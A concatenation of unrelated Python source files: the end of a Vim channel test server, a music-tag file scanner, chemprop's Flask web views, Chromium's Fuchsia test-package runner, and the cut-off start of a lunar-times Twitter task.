print("using: {0}".format(used))
try:
decoded = json.loads(used)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
# simply send back a string
response = "got it"
elif decoded[1].startswith("echo "):
# send back the argument
response = decoded[1][5:]
time.sleep(0.01)
elif decoded[1] == 'make change':
# Send two ex commands at the same time, before
# replying to the request.
cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'bad command':
cmd = '["ex","foo bar"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'do normal':
# Send a normal command.
cmd = '["normal","G$s more\u001b"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-works':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\\" . 123", -1]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-special':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-getline':
# Send an eval request. We ignore the response.
cmd = '["expr","getline(3)", -3]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-fails':
# Send an eval request that will fail.
cmd = '["expr","xxx", -4]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-error':
# Send an eval request that works but the result can't
# be encoded.
cmd = '["expr","function(\\"tr\\")", -5]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-bad':
# Send an eval request missing the third argument.
cmd = '["expr","xxx"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'malformed1':
cmd = '["ex",":"]wrong!["ex","smi"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
time.sleep(0.01)
elif decoded[1] == 'malformed2':
cmd = '"unterminated string'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the double
# quote in the "ok" response terminates the string.
time.sleep(0.2)
elif decoded[1] == 'malformed3':
cmd = '["ex","missing ]"'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the ]
# in the "ok" response terminates the list.
time.sleep(0.2)
elif decoded[1] == 'split':
cmd = '["ex","let '
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
time.sleep(0.01)
cmd = 'g:split = 123"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'an expr':
# Send an expr request.
cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call-func':
cmd = '["call","MyFunction",[1,2,3], 0]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw':
cmd = '["redraw",""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw!':
cmd = '["redraw","force"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'empty-request':
cmd = '[]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-result':
# Send back the last received eval result.
response = last_eval
elif decoded[1] == 'call me':
cmd = '[0,"we called you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call me again':
cmd = '[0,"we did call you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = ""
elif decoded[1] == 'send zero':
cmd = '[0,"zero index"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "sent zero"
elif decoded[1] == 'close me':
print("closing")
self.request.close()
response = ""
elif decoded[1] == 'wait a bit':
time.sleep(0.2)
response = "waited"
elif decoded[1] == '!quit!':
# we're done
self.server.shutdown()
return
elif decoded[1] == '!crash!':
# Crash!
42 / 0
else:
response = "what?"
if response == "":
print("no response")
else:
encoded = json.dumps([decoded[0], response])
print("sending: {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
# Negative numbers are used for "eval" responses.
elif decoded[0] < 0:
last_eval = decoded
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
if __name__ == "__main__":
HOST, PORT = "localhost", 0
# Wait half a second before opening the port to test waittime in ch_open().
# We do want to get the port number, get that first. We cannot open the
# socket, guess a port is free.
if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
PORT = 13684
writePortInFile(PORT)
print("Wait for it...")
time.sleep(0.5)
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
print("Listening on port {0}".format(port))
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.isAlive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
|
LocalFileInterfaz.py | import pathlib
import hashlib
import shutil
import threading
import os
import logging
from pprint import pprint
from mutagen.easyid3 import EasyID3
class LocalFileInterfaz(object):
def __init__(self, dirsInput=[], dirOutput=None):
self.dirsInput = dirsInput
self.dirOutput = dirOutput
self.tipos = [".mp3", ".flac", ".aac", ".ogg", ".m4a"]
self.localTracks = []
self.templateTrack = {"titulo":"",
"artista":"",
"album":"",
"path":""}
def procesarDirsInput(self):
self.localTracks = []
for directorio in self.dirsInput:
self.getPath(directorio = directorio)
def getPath(self,directorio):
lista = []
for root, dirs, files in os.walk(directorio):
for filename in files:
t = threading.Thread(target=self.getDatos,args=(os.path.join(root, filename),lista,))
t.start()
t.join()
self.localTracks.extend(lista)
def getDatos(self, filename, lista):
ext = pathlib.PurePosixPath(filename).suffix.lower()
l = {"titulo":"",
"artista":"",
"album":"",
"path":""}
if ext in self.tipos:
try:
tag = EasyID3(filename)
l["titulo"] = tag["title"][0]
l["artista"] = tag["artist"]
l["album"] = tag["album"][0]
l["path"] = filename
lista.append(l)
except Exception as e:
logging.error("Error con este archivo {} {}".format(filename, e))
else:
logging.info("Archivo no es audio {}".format(filename))
def cpyArchivo(self, filnameIn):
try:
shutil.copy(filnameIn, self.dirOutput)
except Exception as e:
logging.error("Error al copiar archivo {} {}".format(filnameIn, e))
def getLocalTracks(self):
return self.localTracks |
views.py | """Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
# no code to handle crashes in model training yet, though
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
return f'{thing_being_named} "{original_name} already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name is not None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size),
])
# Get task names
args.task_names = get_task_names(path=data_path, smiles_columns=[None])
# Check if regression/classification selection matches data
data = get_data(path=data_path, smiles_columns=[None])
# Set the number of molecules through the length of the smiles_columns for now, we need to add an option to the site later
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
if use_progress_bar:
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, data, logger)[args.metrics[0]]
if use_progress_bar:
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
smiles = [[s] for s in smiles]
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
train_args = load_args(model_paths[0])
# Build arguments
arguments = [
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
'--checkpoint_paths', *model_paths
]
if gpu is not None:
if gpu == 'None':
arguments.append('--no_cuda')
else:
arguments += ['--gpu', gpu]
# Handle additional features
if train_args.features_path is not None:
# TODO: make it possible to specify the features generator if trained using features_path
arguments += [
'--features_generator', 'rdkit_2d_normalized',
'--no_features_scaling'
]
elif train_args.features_generator is not None:
arguments += ['--features_generator', *train_args.features_generator]
if not train_args.features_scaling:
arguments.append('--no_features_scaling')
# Parse arguments
args = PredictArgs().parse_args(arguments)
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
run_test_package.py | # Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contains a helper function for deploying and executing a packaged
executable on a Target."""
from __future__ import print_function
import common
import hashlib
import logging
import multiprocessing
import os
import re
import select
import subprocess
import sys
import threading
import uuid
from symbolizer import BuildIdsPaths, RunSymbolizer, SymbolizerFilter
FAR = common.GetHostToolPathFromPlatform('far')
# Amount of time to wait for the termination of the system log output thread.
_JOIN_TIMEOUT_SECS = 5
def _AttachKernelLogReader(target):
"""Attaches a kernel log reader as a long-running SSH task."""
logging.info('Attaching kernel logger.')
return target.RunCommandPiped(['dlog', '-f'],
stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
class SystemLogReader(object):
"""Collects and symbolizes Fuchsia system log to a file."""
def __init__(self):
self._listener_proc = None
self._symbolizer_proc = None
self._system_log = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stops the system logging processes and closes the output file."""
if self._symbolizer_proc:
self._symbolizer_proc.kill()
if self._listener_proc:
self._listener_proc.kill()
if self._system_log:
self._system_log.close()
def Start(self, target, package_paths, system_log_file):
"""Start a system log reader as a long-running SSH task."""
logging.debug('Writing fuchsia system log to %s' % system_log_file)
self._listener_proc = target.RunCommandPiped(['log_listener'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._system_log = open(system_log_file, 'w', buffering=1)
self._symbolizer_proc = RunSymbolizer(self._listener_proc.stdout,
self._system_log,
BuildIdsPaths(package_paths))
class MergedInputStream(object):
"""Merges a number of input streams into a UNIX pipe on a dedicated thread.
Terminates when the file descriptor of the primary stream (the first in
the sequence) is closed."""
def __init__(self, streams):
assert len(streams) > 0
self._streams = streams
self._output_stream = None
self._thread = None
def Start(self):
"""Returns a pipe to the merged output stream."""
read_pipe, write_pipe = os.pipe()
# Disable buffering for the stream to make sure there is no delay in logs.
self._output_stream = os.fdopen(write_pipe, 'w', 0)
self._thread = threading.Thread(target=self._Run)
self._thread.start()
return os.fdopen(read_pipe, 'r')
def _Run(self):
streams_by_fd = {}
primary_fd = self._streams[0].fileno()
for s in self._streams:
streams_by_fd[s.fileno()] = s
# Set when the primary FD is closed. Input from other FDs will continue to
# be processed until select() runs dry.
flush = False
# The lifetime of the MergedInputStream is bound to the lifetime of
# |primary_fd|.
while primary_fd:
# When not flushing: block until data is read or an exception occurs.
rlist, _, xlist = select.select(streams_by_fd, [], streams_by_fd)
if len(rlist) == 0 and flush:
break
for fileno in xlist:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
# Flush the streams by executing nonblocking reads from the input file
# descriptors until no more data is available, or all the streams are
# closed.
while streams_by_fd:
rlist, _, _ = select.select(streams_by_fd, [], [], 0)
if not rlist:
break
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
def _GetComponentUri(package_name):
return 'fuchsia-pkg://fuchsia.com/%s#meta/%s.cmx' % (package_name,
package_name)
class RunTestPackageArgs:
"""RunTestPackage() configuration arguments structure.
system_logging: If set, connects a system log reader to the target.
test_realm_label: Specifies the realm name that run-test-component should use.
This must be specified if a filter file is to be set, or a results summary
file fetched after the test suite has run.
use_run_test_component: If True then the test package will be run hermetically
via 'run-test-component', rather than using 'run'.
"""
def __init__(self):
self.system_logging = False
self.test_realm_label = None
self.use_run_test_component = False
@staticmethod
def FromCommonArgs(args):
run_test_package_args = RunTestPackageArgs()
run_test_package_args.system_logging = args.include_system_logs
return run_test_package_args
def _DrainStreamToStdout(stream, quit_event):
"""Outputs the contents of |stream| until |quit_event| is set."""
while not quit_event.is_set():
rlist, _, _ = select.select([stream], [], [], 0.1)
if rlist:
line = rlist[0].readline()
if not line:
return
print(line.rstrip())
def RunTestPackage(output_dir, target, package_paths, package_name,
package_args, args):
"""Installs the Fuchsia package at |package_path| on the target,
executes it with |package_args|, and symbolizes its output.
output_dir: The path containing the build output files.
target: The deployment Target object that will run the package.
package_paths: The paths to the .far packages to be installed.
package_name: The name of the primary package to run.
package_args: The arguments which will be passed to the Fuchsia process.
args: RunTestPackageArgs instance configuring how the package will be run.
Returns the exit code of the remote package process."""
system_logger = (_AttachKernelLogReader(target)
if args.system_logging else None)
try:
if system_logger:
# Spin up a thread to asynchronously dump the system log to stdout
# for easier diagnoses of early, pre-execution failures.
log_output_quit_event = multiprocessing.Event()
log_output_thread = threading.Thread(target=lambda: _DrainStreamToStdout(
system_logger.stdout, log_output_quit_event))
log_output_thread.daemon = True
log_output_thread.start()
with target.GetAmberRepo():
target.InstallPackage(package_paths)
if system_logger:
log_output_quit_event.set()
log_output_thread.join(timeout=_JOIN_TIMEOUT_SECS)
logging.info('Running application.')
if args.use_run_test_component:
command = ['run-test-component']
if args.test_realm_label:
command += ['--realm-label=%s' % args.test_realm_label]
else:
command = ['run']
command += [_GetComponentUri(package_name)] + package_args
process = target.RunCommandPiped(command,
stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
if system_logger:
output_stream = MergedInputStream(
[process.stdout, system_logger.stdout]).Start()
else:
output_stream = process.stdout
# Run the log data through the symbolizer process.
output_stream = SymbolizerFilter(output_stream,
BuildIdsPaths(package_paths))
for next_line in output_stream:
print(next_line.rstrip())
process.wait()
if process.returncode == 0:
logging.info('Process exited normally with status code 0.')
else:
# The test runner returns an error status code if *any* tests fail,
# so we should proceed anyway.
logging.warning('Process exited with status code %d.' %
process.returncode)
finally:
if system_logger:
logging.info('Terminating kernel log reader.')
log_output_quit_event.set()
log_output_thread.join()
system_logger.kill()
return process.returncode
|
lunartime.py | import json
import logging
import threading
from const import DATA_FILE_EXT, UTC
from datetime import datetime, time, timedelta
from envvarname import EnvVarName
from pathlib import Path
from pylunar import MoonInfo
from pytz import timezone, utc
from time import sleep
from twitter import TwitterUtil
from typing import Dict
from util import decToDegMinSec, getEnvVar, initDataDir, isEmpty, tupleToDateTime
class LunarTimeTask(object):
LOGGER = logging.getLogger()
_TASK_NAME = "lunartime"
_TIME_FORMAT = "%I:%M %p"
_MESSAGE_TEMPLATE = "Hello {}! The moon will be {}% illuminated. Moonrise is at {} and Moonset is at {}."
_THRESHOLD_SECONDS = 3600
def __init__(self):
"""
Constructor for the Lunar Time Task. This task is responsible for
determining the desired information to publish.
"""
self._thread = threading.Thread(name=self._TASK_NAME, target=self._run, args=())
self._thread.daemon = True # Daemonize thread
self._thread.start() # Start the execution
def _run(self):
self.LOGGER.info("Starting the '" + self._TASK_NAME + "' task")
self._setup()
""" Routine that runs forever """
while True:
self.now = self._tzone.localize(datetime.now())
self.LOGGER.info("Getting lunar times for now {}".format(self.now.isoformat()))
lunar_time_current = self._getLunarTimeCurrent()
moonrise_current = lunar_time_current["rise"]
# Get prior 'lunar_time' from the saved data file
lunar_time_from_file = self._loadLunarTime()
if (lunar_time_from_file):
transit_from_file = datetime.fromisoformat(lunar_time_from_file["transit"])
self.LOGGER.info("Got lunar times from file for {}".format(transit_from_file.isoformat()))
if (transit_from_file == lunar_time_current["transit"]):
self.LOGGER.info("Current lunar times are the same as the file")
self._sleep(moonrise_current)
continue
threshold_before_moonrise_current = moonrise_current - timedelta(seconds=self._THRESHOLD_SECONDS)
if (self.now < threshold_before_moonrise_current or moonrise_current < self.now):
